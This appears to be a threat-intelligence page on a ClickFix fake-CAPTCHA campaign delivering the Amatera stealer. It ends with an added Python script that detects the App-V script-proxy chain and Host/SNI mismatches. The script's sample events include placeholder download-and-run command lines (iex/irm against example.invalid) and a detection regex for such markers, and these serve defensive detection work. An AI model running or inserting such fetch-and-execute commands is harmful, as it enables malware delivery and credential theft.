
ClickFix fake CAPTCHA campaign delivering Amatera

Campaign
Happening score 39
2 unique sources, 2 articles

Summary


A ClickFix campaign now uses a fake CAPTCHA lure and the signed Microsoft App-V script SyncAppvPublishingServer.vbs to deliver the Amatera stealer to Windows victims, raising the risk of credential theft and follow-on compromise. The operation abuses trusted, signed system components so that the malicious execution chain looks like legitimate Windows activity. It also chains wscript.exe, PowerShell, WMI, and in-memory shellcode loading to reduce the number of artifacts written to disk and to evade detection.

Related Happenings

ACSC ClickFix mitigation guidance for Vidar Stealer

Advisory/Mitigation
First: 07.05.2026 21:00 Last: 07.05.2026 21:00 Sources 1

About this happening: The **ACSC** issued mitigation guidance for an **ongoing ClickFix campaign** that is pushing **Vidar Stealer** through **malicious PowerShell commands**, increasing credential-the...

Windows Shell spoofing flaw actively exploited (CVE-2026-32202)

Vulnerability
First: 28.04.2026 08:50 Last: 28.04.2026 08:50 Sources 1

About this happening: **Microsoft** updated **Windows Shell** advisory guidance to confirm **CVE-2026-32202** was **actively exploited in the wild**, raising the risk of sensitive-information disclosur...

DeepLoad credential-stealing malware activity with WMI persistence

Malware Activity
First: 31.03.2026 00:25 Last: 31.03.2026 00:25 Sources 1

About this happening: The **DeepLoad** malware strain is stealing credentials immediately after infection, exposing **stored browser passwords**, **live keystrokes**, and **active accounts** in **enter...

DeepLoad ClickFix loader with browser-credential theft and WMI reinfection

Malware Activity
First: 30.03.2026 18:47 Last: 30.03.2026 18:47 Sources 1

About this happening: The **DeepLoad** malware loader now uses **ClickFix** delivery to compromise Windows hosts, raising the risk of credential theft and reinfection. It abuses **mshta.exe**, obfuscat...

DeepLoad malware uses ClickFix, AI obfuscation, and WMI persistence

Malware Activity
First: 30.03.2026 15:00 Last: 30.03.2026 15:00 Sources 1

About this happening: The **DeepLoad** malware family is actively using **ClickFix** lures and **AI-generated obfuscation** to steal **enterprise credentials** from **Windows** systems, increasing the...

Timeline

  1. 26.01.2026 23:42 · 2 articles

    BlackPoint Cyber discloses ClickFix-Amatera campaign

    Initial Disclosure

    BlackPoint Cyber describes a new ClickFix-style campaign that starts with a fake CAPTCHA lure that has the victim paste a command into the Windows Run dialog. The command abuses the signed App-V script SyncAppvPublishingServer.vbs, executed through wscript.exe, to launch PowerShell, and the chain then stages Amatera delivery with WMI, configuration fetched from a public Google Calendar, PNG steganography hosted on public CDNs, and in-memory shellcode execution. The same reporting notes that Amatera can collect browser data and credentials, and recommends restricting Run dialog access, removing unused App-V components, enabling PowerShell logging, and monitoring outbound connections for mismatches between the HTTP Host header and the TLS SNI.

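The following Python is an added example, not code from the original page or from BlackPoint Cyber. It turns the reported chain and the recommended monitoring into two concrete checks: a classifier over process-creation events that flags wscript.exe/cscript.exe running SyncAppvPublishingServer.vbs (and, when the parent is explorer.exe, a likely Run dialog launch), plus PowerShell spawned from a script host with download-and-run or in-memory markers on its command line; and a Host header versus TLS SNI comparison for outbound flows. The event layout (Sysmon-style records reduced to image, command line and parent image; a minimal flow record) and every sample event are constructed for illustration, and the PowerShell command lines are placeholders pointing at example.invalid rather than anything from the campaign.

```python
"""Detection helpers for the ClickFix / SyncAppvPublishingServer.vbs chain.

Added example, not code from the original reporting. The record layouts and
all sample events below are constructed for illustration.
"""
import re
from dataclasses import dataclass

# Signed App-V helper that hands its "n;<command>" argument to PowerShell,
# which is how the reported campaign launches PowerShell from wscript.exe.
APPV_SCRIPT = "syncappvpublishingserver.vbs"
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Markers of download-and-run or in-memory execution in a PowerShell command line.
DOWNLOAD_OR_INMEMORY = re.compile(
    r"iex|invoke-expression|downloadstring|downloadfile|frombase64string|\s-e(nc|ncodedcommand)?\s",
    re.IGNORECASE,
)


@dataclass
class ProcEvent:
    image: str          # full path of the created process
    command_line: str
    parent_image: str   # full path of the parent process


@dataclass
class Flow:
    dst_ip: str
    tls_sni: str    # server name from the TLS ClientHello
    http_host: str  # Host header; only visible from a proxy or TLS-inspecting sensor


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(ev: ProcEvent) -> list:
    """Return finding tags for one process-creation event (empty list if benign)."""
    image = basename(ev.image)
    parent = basename(ev.parent_image)
    cmd = ev.command_line.lower()
    findings = []
    if image in SCRIPT_HOSTS and APPV_SCRIPT in cmd:
        findings.append("appv_script_proxy")
        # explorer.exe hosts the Run dialog, so this parent matches the ClickFix
        # paste-into-Win+R step rather than a logon or scheduled script.
        if parent == "explorer.exe":
            findings.append("run_dialog_launch")
    if image in POWERSHELL and parent in SCRIPT_HOSTS:
        findings.append("powershell_from_script_host")
        if DOWNLOAD_OR_INMEMORY.search(cmd):
            findings.append("download_or_inmemory")
    return findings


def scan(events) -> list:
    """(index, findings) for every event that produced at least one tag."""
    return [(i, f) for i, ev in enumerate(events) if (f := classify(ev))]


def sni_host_mismatch(flow: Flow) -> bool:
    """True when the TLS SNI and the HTTP Host header name different servers."""
    sni = flow.tls_sni.lower().rstrip(".")
    host = flow.http_host.lower().split(":")[0].rstrip(".")
    return bool(sni and host) and sni != host


# Constructed sample events: a ClickFix-style chain (0, 1) and two benign launches (2, 3).
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\wscript.exe",
              r'wscript.exe C:\Windows\System32\SyncAppvPublishingServer.vbs "n;iex (irm https://example.invalid/stage)"',
              r"C:\Windows\explorer.exe"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell.exe -Command "iex (irm https://example.invalid/stage)"',
              r"C:\Windows\System32\wscript.exe"),
    ProcEvent(r"C:\Windows\System32\wscript.exe",
              r"wscript.exe \\fileserver\netlogon\map-drives.vbs",
              r"C:\Windows\System32\userinit.exe"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -NoProfile",
              r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for index, findings in scan(SAMPLE_EVENTS):
        print(index, basename(SAMPLE_EVENTS[index].image), findings)
```

Running the module prints only events 0 and 1: the first as an App-V script proxy launched from the Run dialog, the second as PowerShell spawned by a script host with an in-memory execution marker. The benign logon script and the interactive shell produce no findings because the checks key on the specific script name and parent-child pairing rather than on wscript.exe or PowerShell alone. The SNI check only works where a proxy or TLS-inspecting sensor exposes the Host header; on raw network telemetry the SNI is the only name available.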